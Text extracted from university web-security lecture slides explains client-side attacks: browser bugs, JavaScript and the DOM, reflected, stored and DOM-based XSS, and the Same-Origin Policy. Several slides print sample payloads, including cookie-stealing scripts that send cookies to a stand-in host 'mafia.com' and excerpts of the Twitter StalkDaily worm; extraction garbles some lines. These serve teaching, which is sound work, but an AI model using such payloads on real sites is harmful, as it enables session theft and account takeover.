Attacks on ClientsAttacks on Clients
Transcript of Attacks on ClientsAttacks on Clients
![Page 1: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/1.jpg)
Software and Web Security 2Software and Web Security 2
Attacks on ClientsAttacks on Clients
(Section 7.1.3 on JavaScript;(Section 7.1.3 on JavaScript;7.2.4 on Media content;
7.2.6 on XSS)
sws2 1
![Page 2: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/2.jpg)
Last week: web server can be attacked by malicious input
web browser web server
sws2 2
![Page 3: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/3.jpg)
Last week: web server can be attacked by malicious inputThi k li t i b b b tt k d b li i i tThis week: client, ie web browser, can be attacked by malicious input
Even the human user can be attacked: recall URL obfuscation.
web browser web server
sws2 3
![Page 4: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/4.jpg)
example client side problem
sws2 4
![Page 5: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/5.jpg)
Browser bugsgThe web browser get untrusted input from the server.Bugs in the browser can become exploitable vulnerabilitiesg p• also bugs in browser add-ons, or other helper applications
• Classic Denial of Service (DoS) example: IE image crash. An image with huge size could crash Internet Explorer and freeze Windows machine<HTML><BODY><img src=”a.jpg” width =”999999999” height=“99999999”></BODY><HTML>
Things get more interesting as processing in the browser gets more powerful, and languages involved are more complex
sws2 5
![Page 6: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/6.jpg)
More dangerous browser bugsg gDenial of Service bugs are the least of your worries...
Possibility of drive-by-downloadswhere just visiting a webpage can install malware, by exploiting
it h l i b hi lib i di lsecurity holes in browser, graphics libraries, media players, ...
Homework exercise:Homework exercise: check securityfocus.com for security vulnerabilitiesfor your favourite web browser
sws2 6
![Page 7: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/7.jpg)
Dynamic webpages(Sect 7.1.3 & 7.2.4 in book)
sws2 7
![Page 8: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/8.jpg)
Recall: dynamic webpagesy g
Most web pages do not just contain static HTML, but are dynamic: i th t i t bl t tie they contain executable content.This is an interesting attack vector.
execution aka processingexecution aka processing
web browser web server
sws2 8
![Page 9: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/9.jpg)
Dynamic Contenty
Languages for dynamic content:J S i t• JavaScript
• Flash, Silverlight, ...• ActiveXActiveX• Java• ....
JavaScript is by far the most widespread of these technologies: nearly all web pages include JavaScriptnearly all web pages include JavaScript
• CSS – Cascading Style Sheets – defines layout of headers, links,CSS Cascading Style Sheets defines layout of headers, links, etc; not quite execution, but can be abused, and can contain javascript.
sws2 9
![Page 10: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/10.jpg)
Controlling Dynamic Content (7.2.4)g y
Executing dynamic content can be controlled inside a sandbox
NB the sandbox is made from softwareif there are security vulnerabilities in this software, all bets are off,if there are security vulnerabilities in this software, all bets are off, and attacker might escape...
sws2 10
![Page 11: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/11.jpg)
ActiveX controls vs Java applets
• Windows only technology, runs in Internet Explorer (IE)
• platform independent downside: OS patching might missruns in Internet Explorer (IE)
.• binary code executed on
behalf of the browser
downside: OS patching might miss Java patching
• bytecode executed on virtual machine within browserbehalf of the browser . machine within browserbinary code is for specific machine, byte code is interpreted by virtual
hi• can access user files• support for signed code
l Mi ft OS d t t
machine• restrictive sandbox• support for signed codeplus Microsoft OS update can set
kill bit to stop dangerous controls• an installed control can be run
support for signed code
• applet only runs on site where it from any website (up to IE7)
• IE configuration optionsallow block prompt
is embedded• sandboxing configuration
– allow, block, prompt– also control by administrator
sws2 11
![Page 12: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/12.jpg)
JavaScript & the DOMJavaScript & the DOM(Sect 7.1.3)
sws2 12
![Page 13: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/13.jpg)
JavaScript
• embedded in web page to support client-side dynamic behaviourd l d b N t l t t d di d b ECMA• developed by Netscape, later standardised by ECMA
• JavaScript has NOTHING to do with Java
• typical uses:– dynamic user interaction with the web page
Eg opening and closing menus, changing pictures,...JavaScript code can completely rewrite the contents of an HTML page!
– client-side input validationpEg has the user entered a correct date, a syntactically correct email address or credit card number, or a strong enough password?NB such validation should not be security critical! Why?NB such validation should not be security critical! Why?
Malicious client can by-pass such validation!
sws2 13
![Page 14: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/14.jpg)
JavaScript (Sect 7.1.3 in book)
• scripting language interpreted by browser, with code in the HTML <script type=“text/javascript”> </script><script type=“text/javascript”> ... </script>
optional, default is javascript
• Built-in functions eg to change content of the window<script> alert(‘Hello World!’); </script>
A web page can define additional functions<script>function hi(){alert(‘Hello World!’);}</script>
• built-in events for reacting to user actions<i “ i j ” M O ”j i t hi()”><img src=“pic.jpg” onMouseOver=”javascript:hi()”>
Some examples in http://www.cs.ru.nl/~erikpoll/sws2/demo/demo_javascript.html
sws2 14
![Page 15: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/15.jpg)
DOM (Document Object Model)( j )
The DOM is representation of the content of a webpage, in OO styleThe webpage is an object document with sub objects such asThe webpage is an object document with sub-objects, such as document.URL, document.referrer, document.cookie,...
JavaScript can interact with the DOM to access or change parts of the current webpage
incl text URL cookiesincl. text, URL, cookies, ....
This gives JavaScript its real power! Eg it allows scripts to change layout and content of the webpage, open and menus in the webpage,...
See http://www.cs.ru.nl/~erikpoll/sws2/demo/demo_DOM.html for some examples
sws2 15
![Page 16: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/16.jpg)
Security featuresy
• The user environment is protected from malicious JavaScript programs by a sand boxing environment inside browserprograms by a sand-boxing environment inside browser
• JavaScript programs are protected from each other by p p g p ycompartementalisation– Same-Origin-Policy: code can only access resources with the
same origin site (more on that later)same origin site (more on that later)
As we will see, such protection has its limits...
sws2 16
![Page 17: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/17.jpg)
HTML injection & XSS
sws2 17
![Page 18: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/18.jpg)
sos Search
No matches found for sosNo matches found for sos
18sws2
![Page 19: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/19.jpg)
<h1>sos</h1> Search
No matches found forNo matches found for
sos
19sws2
![Page 20: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/20.jpg)
What proper input validation should produce
h1 /h1<h1>sos</h1> Search
No matches found for sos
or
<h1>sos</h1> Search
No matches found for <h1>sos</h1>
Here < and > written as < and > in the HTML source
sws2 20
![Page 21: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/21.jpg)
What can happen if we enter more complicated HTML code as search term ?search term ?
<img source="http://www.spam.org/advert.jpg">
<script language=“text/javascript"> alert('Hoi');alert('Hoi');
</script>
Note that in the last example we enter executable code – javascript.Such HTML injection is called Cross Site Scripting (XSS)
sws2 21
![Page 22: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/22.jpg)
HTML injectionj
HTML injection: user input is echoed back to the clientwithout validation or escapingwithout validation or escaping
But why is this a security problem?
1 simple HTML injectionattacker can deface a webpage, with pop-ups, ads, or fake info http://cnn.com/search?string=“<h1>Obama sends US troopshttp://cnn.com/search?string <h1>Obama sends US troops to Kiev</h1> <img=.......>”Such HTML injections abuses trust that a user has in a website: the user believes the content is from the website,the user believes the content is from the website, when in fact it comes from an attacker
2 XSS2 XSSthe injected HTML contains executable content, typically javascriptExecution of this code can have all sorts of nasty effects...
sws2 22
![Page 23: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/23.jpg)
XSS (Cross Site Scripting) ( g)
Attacker inject scripts into a website, such thati t d t i ti• scripts are passed on to a victim
• scripts are executed, – in the victim’s browserin the victim s browser– with the victim’s access rights – with the victim’s data – incl. cookies– interacting with the user, with the webpage (using the DOM),
causing new HTTP requests, ...
Usually injected scripts are javascript, but could be Flash, ActiveX, Java...
sws2 23
![Page 24: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/24.jpg)
Simple HTML injectionj
b
maliciousoutput
web serverbrowser
sws2 24
![Page 25: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/25.jpg)
XSS
processing of malicious scripts
b
malicious outputincl. scripts
web serverbrowser
unwanted requests
anotherweb server
unwanted requests
web server
sws2 25
![Page 26: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/26.jpg)
stealing cookies with XSSg
Considerhtt // i ti / h h ?t < i t>http://victim.com/search.php?term=<script>
window.open(“http://mafia.com/steal.php?cookie=” + document.cookie</script>/ p
What if user clicks on this link?1. browser goes to http://victim.com/search.php2. website victim.com returns
<HTML> Results for <script> <script> </HTML><HTML> Results for <script>....<script> </HTML>3. browser executes script and sends mafia his cookie
sws2 26
![Page 27: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/27.jpg)
stealing cookies using XSSg g
M t lth f t li kiMore stealthy way of stealing cookies
<script><script>img = new Image();img.src =“http://mafia.com/” +
d URI(d t ki )encodeURI(document.cookie) </script>
Better because the user won’t notice a change in the webpage when this script is executed, unlike the one on the previous pageis executed, unlike the one on the previous page
sws2 27
![Page 28: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/28.jpg)
Delivery mechanism for XSSy
Diff t f tt k t t i t t th i ti ’ bDifferent ways for an attacker to get scripts on to the victim’s browsers
1. reflected aka non-persistent XSS1. reflected aka non persistent XSS2. stored aka persistent XSS3. DOM based XSS
sws2 28
![Page 29: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/29.jpg)
scenario 1: reflected XSS attack
• Attacker crafts a special URL for a vulnerable web site, ft URL t i i j i toften a URL containing javascript
• Attacker then tempts victim to click on this linkAttacker then tempts victim to click on this link by sending an email that includes the link, or posting this link on a website.
sws2 29
![Page 30: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/30.jpg)
reflected aka non-persistent XSS
maliciousURL
bweb server
HTML containing malicious output
sws2 30
![Page 31: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/31.jpg)
scenario 2: stored XSS attack
• Attacker injects HTML - incl. scripts - into a web site, hi h i t d t th t b itwhich is stored at that web site
• This is echoed back later when victim visit the same site
• Typical examples where attacker can try this– some web forum– a book review on amazon.com– a posting on blackboard.ru.nl– ...Web2.0 web sites, which allow user-generated content, are ideal for this.
sws2 31
![Page 32: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/32.jpg)
Stored aka persistent XSS
maliciousinput
b data
attacker storingmalicious content on website
web server database
HTML containing malicious output
another user
sws2 32
of the same website
![Page 33: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/33.jpg)
scenario 3: DOM based attack
Attacker injects malicious content into a webpage via existing scripts i th t b th t i t t ith th DOMin that webpage that interact with the DOM
Eg, the javascript codeg, j p<script> var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));</script></script>
in webpage will copy name parameter from URL into that webpageEg, for http://bla.com/welcome.html?name=Jan it will return Jan
But what if the URL contains javascript in the name?eg http://bla com/welcome html?name=<script>eg http://bla.com/welcome.html?name=<script>...
An attacker can now use a malicious URL, as in a reflected attack
sws2 33
![Page 34: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/34.jpg)
scenario 3: DOM based attack
The injected payload can for instance be in the URLDetails depend on the browserDetails depend on the browser
eg. browser may encode < and > in URL
A good web application might spot a malicious URLbut ...the server may by-passed and never get to see the malicious
payload!payload!http://bla.com/welcome.html#name=<script>.....<script>
Part of the URL after # is not sent to bla.com, but is part of document.URLSo server-side validation can’t help...S p
sws2 34
![Page 35: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/35.jpg)
XSS vulnerability on twitter
sws2 35
![Page 36: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/36.jpg)
example: persistent XSS attack on Google docsg
• save as CSV file in spreadsheets.google.com• some web browsers render this content as HTML, and execute the
script!• this then allows attacks on gmail.com, docs.google.com,
d l b th ll h th kicode.google.com, .. because these all share the same cookie
Is this the browser’s fault, or the web-site’s (ie google docs) fault?
sws2 36
![Page 37: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/37.jpg)
Twitter StalkDaily worm executed when thi
Included in twitter profile:<a href="http://stalkdaily com"/><script src="http://evil org/attack js”>
you see this profile
<a href= http://stalkdaily.com /><script src= http://evil.org/attack.js”>...where attack.js includes the following attack code
var update = urlencode("Hey everyone, join www.StalkDaily.com."); p ( y y , j y );var ajaxConn = new XHConn();...ajaxConn.connect("/status/update", "POST",
"authenticity token="+authtoken+"&status="+update+“
tweet the link
authenticity_token= +authtoken+ &status= +update+ &tab=home&update=update");
var set = urlencode('http://stalkdaily.com"></a><script src="http://evil.org/attack.js"> </script><script
src="http://evil.org/attack.js"></script><a '); ajaxConn1.connect("/account/settings", "POST",
"authenticity_token="+authtoken+"&user[url]="+set+“ &tab=home&update=update");
change profile to include
sws2 37
the attack code!
![Page 38: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/38.jpg)
Same-Origin-Policy
sws2 38
![Page 39: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/39.jpg)
Same-Origin-Policy (SOP)g y ( )
Same-Origin-Policy intended to prevent attack from a malicious website on other web pages a user is interacting withon other web pages a user is interacting with
sws2 39
![Page 40: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/40.jpg)
Single-Origin-Policy prevents some interactiong g y
client browser
twitter.com mafia.com
sws2 40
![Page 41: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/41.jpg)
Same-Origin-Policy (SOP)g y ( )
Same-Origin-Policy intended to prevent attack from a malicious website on other web pages a user is interacting withon other web pages a user is interacting with
Basic idea• Scripts can only access information with same origin p y g
where origin is triple <scheme, address, port>– eg <http, ru.nl, 80>, <https, ru.nl, 1080>
HTML t t b l t i i h it d l d d• HTML content belongs to origin where it was downloaded• Scripts included in a HTML document have the origin of that
document including themg– rationale: author of HTML page should know that scripts he
includes are harmless
See demos in http://www.cs.ru.nl/~erikpoll/sws2/demo/test_SOP.htmland http://www.cs.ru.nl/~erikpoll/sws2/demo/test_SOP2.html
sws2 41
![Page 42: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/42.jpg)
Will SOP prevent cookie stealing?g
Suppose attacker injects cookie stealing script in blackboard.ru.nl
Will the SOP prevent this script from accessing cookie? No!
Scripts include in blackboard.ru.nl will have access to the cookie of that domain.Even if the scipt is included in via a link, such as
<script src “http://mafia com/steal cookie js”><script src=“http://mafia.com/steal_cookie.js”>
sws2 42
![Page 43: Attacks on ClientsAttacks on Clients](https://reader034.fdocuments.in/reader034/viewer/2022051804/6281dbce696dcc589909fe1b/html5/thumbnails/43.jpg)
Circumventing the Single-Origin-Policyg g g y
attacker uploadsattacker uploadsmalicious contentuser’s browser can’t
distinguish between good & bad scripts
attacker browserclient browser
good & bad scripts
twitter.com mafia.com
sws2 43